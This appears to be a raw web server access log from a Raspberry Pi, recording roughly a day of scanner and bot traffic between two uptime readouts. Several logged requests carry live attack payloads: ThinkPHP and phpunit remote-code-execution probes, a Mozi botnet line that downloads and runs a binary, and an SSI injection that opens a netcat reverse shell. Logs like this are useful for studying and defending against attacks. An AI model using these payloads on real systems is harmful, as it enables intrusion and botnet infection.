Fri Feb 28 06:25:17 MST 2020 06:25:17 up 3 days, 11:53, 1 user, load average: 2.49, 1.89, 1.06 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Mon12 3days 4:09 0.86s /usr/bin/lxsession -s LXDE-pi -e LXDE 201.110.172.16 - - [28/Feb/2020:14:35:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 110.249.212.46 - - [28/Feb/2020:15:29:22 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 110.249.212.46 - - [28/Feb/2020:15:29:24 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 110.249.212.46 - - [28/Feb/2020:15:29:25 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 110.249.212.46 - - [28/Feb/2020:15:29:29 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 110.249.212.46 - - [28/Feb/2020:15:29:30 +0000] "GET /testget?q=23333&port=80 HTTP/1.1" 404 0 "" "" 182.114.208.118 - - [28/Feb/2020:15:40:49 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 75.99.173.82 - - [28/Feb/2020:18:11:04 +0000] "GET / HTTP/1.1" 400 0 "" "" 223.71.167.165 - - [28/Feb/2020:18:23:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 24.51.32.122 - - [28/Feb/2020:19:33:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 173.249.51.194 - - [28/Feb/2020:19:37:05 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 203.160.56.114 - - [28/Feb/2020:19:46:29 +0000] "GET / HTTP/1.0" 200 25000 "" "" 31.34.94.252 - - [28/Feb/2020:19:47:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 193.57.40.38 - - [28/Feb/2020:20:11:39 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [28/Feb/2020:20:11:39 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [28/Feb/2020:20:11:39 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [28/Feb/2020:20:11:39 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 159.65.27.252 - - [28/Feb/2020:20:26:39 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 89.143.56.150 - - [28/Feb/2020:20:26:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 92.11.24.234 - - [28/Feb/2020:20:41:07 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.189.151.188 - - [28/Feb/2020:20:48:34 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 193.57.40.38 - - [28/Feb/2020:20:53:59 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 188.163.35.202 - - [28/Feb/2020:22:41:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 81.168.94.171 - - [28/Feb/2020:23:54:18 +0000] "GET / HTTP/1.1" 400 0 "" "" 81.168.94.171 - - [28/Feb/2020:23:54:20 +0000] "GET / HTTP/1.1" 400 0 "" "" 47.98.62.200 - - [28/Feb/2020:23:58:34 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 139.162.119.197 - - [29/Feb/2020:00:52:45 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 193.202.44.194 - - [29/Feb/2020:01:33:30 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 193.202.44.194 - - [29/Feb/2020:01:33:30 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 138.204.135.93 - - [29/Feb/2020:02:00:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 189.131.10.169 - - [29/Feb/2020:02:29:56 +0000] "GET / HTTP/1.1" 400 0 "" "" 108.26.26.3 - - [29/Feb/2020:02:32:08 +0000] "GET / HTTP/1.1" 400 0 "" "" 185.220.101.27 - - [29/Feb/2020:02:40:41 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.220.101.27 - - [29/Feb/2020:02:40:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 51.75.24.151 - - [29/Feb/2020:03:07:33 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 93.178.103.164 - - [29/Feb/2020:03:09:54 +0000] "GET / HTTP/1.1" 400 0 "" "" 54.149.95.138 - - [29/Feb/2020:03:17:49 +0000] "GET / HTTP/1.1" 200 25000 "" "curl/7.58.0" 68.188.99.68 - - [29/Feb/2020:03:26:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 68.188.99.68 - - [29/Feb/2020:03:26:56 +0000] "GET / HTTP/1.1" 400 0 "" "" 59.58.206.34 - - [29/Feb/2020:03:41:43 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world" 109.117.235.55 - - [29/Feb/2020:04:22:15 +0000] "GET / HTTP/1.1" 400 0 "" "" 109.117.235.55 - - [29/Feb/2020:04:22:51 +0000] "GET / HTTP/1.1" 400 0 "" "" 109.117.235.55 - - [29/Feb/2020:04:23:18 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 109.117.235.55 - - [29/Feb/2020:04:25:53 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 66.240.205.34 - - [29/Feb/2020:05:12:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 164.163.236.165 - - [29/Feb/2020:06:03:29 +0000] "GET / HTTP/1.1" 400 0 "" "" 51.15.27.138 - - [29/Feb/2020:06:17:01 +0000] "GET / HTTP/1.1" 200 25000 "" "" 104.152.52.38 - - [29/Feb/2020:08:31:43 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 212.233.238.31 - - [29/Feb/2020:08:47:54 +0000] "GET / HTTP/1.1" 400 0 "" "" 177.155.36.253 - - [29/Feb/2020:09:17:07 +0000] "GET / HTTP/1.0" 200 25000 "" "" 37.49.226.137 - - [29/Feb/2020:09:32:40 +0000] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2037.49.226.137%2029312%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 0 "" "" 123.25.21.125 - - [29/Feb/2020:10:40:41 +0000] "GET / HTTP/1.1" 400 0 "" "" 177.46.199.46 - - [29/Feb/2020:10:47:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 91.140.86.131 - - [29/Feb/2020:11:21:18 +0000] "GET / HTTP/1.0" 200 25000 "" "" 93.174.95.106 - - [29/Feb/2020:11:23:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 93.174.95.106 - - [29/Feb/2020:11:23:32 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "" 93.174.95.106 - - [29/Feb/2020:11:23:32 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" "" 93.174.95.106 - - [29/Feb/2020:11:23:32 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" "" 93.174.95.106 - - [29/Feb/2020:11:23:33 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.22.0" 5.232.227.91 - - [29/Feb/2020:12:41:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Sat Feb 29 06:25:14 MST 2020 06:25:15 up 4 days, 11:53, 1 user, load average: 2.52, 1.70, 0.87 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Mon12 4days 4:44 0.86s /usr/bin/lxsession -s LXDE-pi -e LXDE